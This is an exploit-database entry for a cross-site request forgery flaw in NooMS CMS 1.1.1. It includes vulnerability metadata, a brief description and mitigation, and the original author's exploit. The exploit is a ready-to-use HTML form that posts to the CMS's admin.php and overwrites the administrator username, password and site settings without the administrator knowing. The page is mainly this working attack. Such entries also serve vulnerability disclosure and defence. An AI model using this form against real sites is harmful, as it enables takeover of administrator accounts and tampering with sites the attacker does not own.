header-logo
Suggest Exploit
vendor:
NooMS
by:
loneferret
3.1
CVSS
MEDIUM
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: NooMS
Affected Version From: 1.1.2001
Affected Version To: 1.1.2001
Patch Exists: NO
Related CWE: N/A
CPE: a:phpkode:nooms:1.1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2011

NooMS CMS version 1.1.1 CSRF

A Cross-Site Request Forgery (CSRF) vulnerability exists in NooMS CMS version 1.1.1. An attacker can craft a malicious HTML page that contains a form with hidden fields that when submitted, will modify the settings of the NooMS CMS. The form contains fields for the admin username, admin password, site name, site URL, number of results per page, language, and theme. An attacker can modify these settings without the knowledge of the administrator.

Mitigation:

The vendor has not released a patch for this vulnerability. As a workaround, administrators should ensure that they are not using NooMS CMS version 1.1.1.
Source

Exploit-DB raw data:

# NooMS CMS version 1.1.1 CSRF
# Bug Found: April 9th 2011
# Found by: loneferret (as far as I know anyway)
# Software Download Link:
http://phpkode.com/download/p/2381_nooms_1.1.1.tar.bz2
# Nods to exploit-db Team


# Well, I didn't have much to do this morning so figured I'd try to see how
# fast it would take
# me to find one of these. It's nothing to write home about. I mean...come
# on! Who would use
# a CMS named NooMS? This thing uses a MySQL database as well, wouldn't be
# surprised if
# there are other things to be found.
# But I need to get some chores done before the wife starts.

#
# Enjoy,
# loneferret
#
# p.s:
# I wanted to contact the creator, but he's page (using NooMS) is
# blank... nothing there so.. sorry.

---HTML STARTS HERE---

<form action='http://[host]/admin.php' method='post'>
  <input type=hidden name='op' value='pref'>
  <input type=hidden name='action' value='edit'>

  Admin Username: <input type=text size=20 name='admin_user' value=''><br>
  Admin Password: <input type=text size=20 name='admin_pwd' value=''><br>
  Site Name: <input type=text size=40 name='site_name' value=''><br>
  Site URL: <input type=text size=40 name='site_url' value=''><br>
  Number of results per page: <input type=text size=10 name='search_numr' value=''><br>
  Lang: <input type=text size=10 name='lang' value='en'><br>
  Theme: <input type=text name=template value='default'>
  <input type=submit value='change'>
</form>

Navigation

Suggest Exploit

Services By CQR